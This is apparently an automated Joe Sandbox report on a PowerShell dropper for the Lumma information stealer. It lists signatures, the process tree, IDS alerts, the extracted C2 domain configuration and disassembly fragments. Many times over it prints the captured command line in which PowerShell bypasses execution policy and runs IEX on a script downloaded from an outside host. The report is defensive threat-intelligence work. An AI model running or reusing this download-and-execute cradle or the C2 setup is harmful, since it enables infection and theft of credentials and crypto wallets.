Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lumma.ps1

Overview

General Information

Sample name:lumma.ps1
Analysis ID:1582291
MD5:e68c88b1be041d41149461edef165243
SHA1:1b15c0f200880630b8a7c5d7d8f4e54a54a8171e
SHA256:15f7511803399243beafdaecbc4cb3ad0dc25f97d9fafc6bead3147fdfbb3d66
Tags:ps1user-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7792 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7652 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["advicebedsu.click", "screwamusresz.buzz", "inherineau.buzz", "scentniej.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz"], "Build id": "yJEcaG--singl5"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.2613418529.0000000006E60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: powershell.exe PID: 7432JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 7432INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x10ef06:$b1: ::WriteAllBytes(
          • 0x10f82b:$b1: ::WriteAllBytes(
          • 0x41efd:$s1: -join
          • 0x46e08:$s1: -join
          • 0x10b448:$s1: -join
          • 0x10efbc:$s1: -join
          • 0x10f8e1:$s1: -join
          • 0x123813:$s1: -join
          • 0x147e8a:$s1: -join
          • 0x183bdc:$s1: -join
          • 0x190cb1:$s1: -join
          • 0x194083:$s1: -join
          • 0x194735:$s1: -join
          • 0x196226:$s1: -join
          • 0x19842c:$s1: -join
          • 0x198c53:$s1: -join
          • 0x1994c3:$s1: -join
          • 0x199bfe:$s1: -join
          • 0x199c30:$s1: -join
          • 0x199c78:$s1: -join
          • 0x199c97:$s1: -join
          Process Memory Space: powershell.exe PID: 7792JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: powershell.exe PID: 7792INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xc61ea1:$b2: ::FromBase64String(
            • 0x3ae71:$s1: -join
            • 0x47f46:$s1: -join
            • 0x4b318:$s1: -join
            • 0x4b9ca:$s1: -join
            • 0x4d4bb:$s1: -join
            • 0x4f6c1:$s1: -join
            • 0x4fee8:$s1: -join
            • 0x50758:$s1: -join
            • 0x50e93:$s1: -join
            • 0x50ec5:$s1: -join
            • 0x50f0d:$s1: -join
            • 0x50f2c:$s1: -join
            • 0x5177c:$s1: -join
            • 0x518f8:$s1: -join
            • 0x51970:$s1: -join
            • 0x51a03:$s1: -join
            • 0x51c69:$s1: -join
            • 0x53dff:$s1: -join
            • 0x62849:$s1: -join
            • 0x77f91:$s1: -join
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.powershell.exe.6e60000.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_7432.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_7792.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: PowerShell Download and Execution Cradles
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , ProcessId: 7792, ProcessName: powershell.exe
                  Sigma detected: Suspicious PowerShell Download and Execute Pattern
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , ProcessId: 7792, ProcessName: powershell.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ProcessId: 7432, ProcessName: powershell.exe
                  Sigma detected: PowerShell Download Pattern
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , ProcessId: 7792, ProcessName: powershell.exe
                  Sigma detected: PowerShell Web Download
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , ProcessId: 7792, ProcessName: powershell.exe
                  Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , ProcessId: 7792, ProcessName: powershell.exe
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , ProcessId: 7792, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ProcessId: 7432, ProcessName: powershell.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Powershell Download and Execute IEX
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} , ProcessId: 7792, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T09:19:23.830003+010020283713Unknown Traffic192.168.2.449916104.21.84.241443TCP
                  2024-12-30T09:19:24.745174+010020283713Unknown Traffic192.168.2.449922104.21.84.241443TCP
                  2024-12-30T09:19:25.981846+010020283713Unknown Traffic192.168.2.449930104.21.84.241443TCP
                  2024-12-30T09:19:26.985741+010020283713Unknown Traffic192.168.2.449940104.21.84.241443TCP
                  2024-12-30T09:19:28.097403+010020283713Unknown Traffic192.168.2.449947104.21.84.241443TCP
                  2024-12-30T09:19:29.202231+010020283713Unknown Traffic192.168.2.449956104.21.84.241443TCP
                  2024-12-30T09:19:30.566083+010020283713Unknown Traffic192.168.2.449965104.21.84.241443TCP
                  2024-12-30T09:19:32.495395+010020283713Unknown Traffic192.168.2.449977104.21.84.241443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T09:19:24.289204+010020546531A Network Trojan was detected192.168.2.449916104.21.84.241443TCP
                  2024-12-30T09:19:25.342316+010020546531A Network Trojan was detected192.168.2.449922104.21.84.241443TCP
                  2024-12-30T09:19:32.940364+010020546531A Network Trojan was detected192.168.2.449977104.21.84.241443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T09:19:24.289204+010020498361A Network Trojan was detected192.168.2.449916104.21.84.241443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T09:19:25.342316+010020498121A Network Trojan was detected192.168.2.449922104.21.84.241443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T09:19:26.529167+010020480941Malware Command and Control Activity Detected192.168.2.449930104.21.84.241443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 8.2.powershell.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["advicebedsu.click", "screwamusresz.buzz", "inherineau.buzz", "scentniej.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz"], "Build id": "yJEcaG--singl5"}
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                  Sample uses string decryption to hide its real strings
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: inherineau.buzz
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: scentniej.buzz
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: advicebedsu.click
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000008.00000002.2629409922.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yJEcaG--singl5
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004157C0 CryptUnprotectData,8_2_004157C0
                  Source: unknownHTTPS traffic detected: 104.21.72.190:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49916 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49922 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49930 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49940 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49947 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49956 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49965 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.241:443 -> 192.168.2.4:49977 version: TLS 1.2
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D3A02Fh2_2_06D39C99
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D3A02Fh2_2_06D39CA8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D3CDC1h2_2_06D3CA40
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D3CDC1h2_2_06D3CA30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D3A473h2_2_06D3A3F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06D3A473h2_2_06D3A3E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]8_2_00408A50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00421A10
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042D34A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, ebx8_2_00427440
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]8_2_00427440
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]8_2_0040CC7A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ebx8_2_00408600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]8_2_00441720
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0042C850
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push esi8_2_0040C805
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h8_2_00422830
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]8_2_0043C830
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, ecx8_2_004290D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042E0DA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0041D8D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0041D8D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042C0E6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx8_2_0041B8F6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx8_2_0041B8F6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042C09E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, ebx8_2_0041C8A0
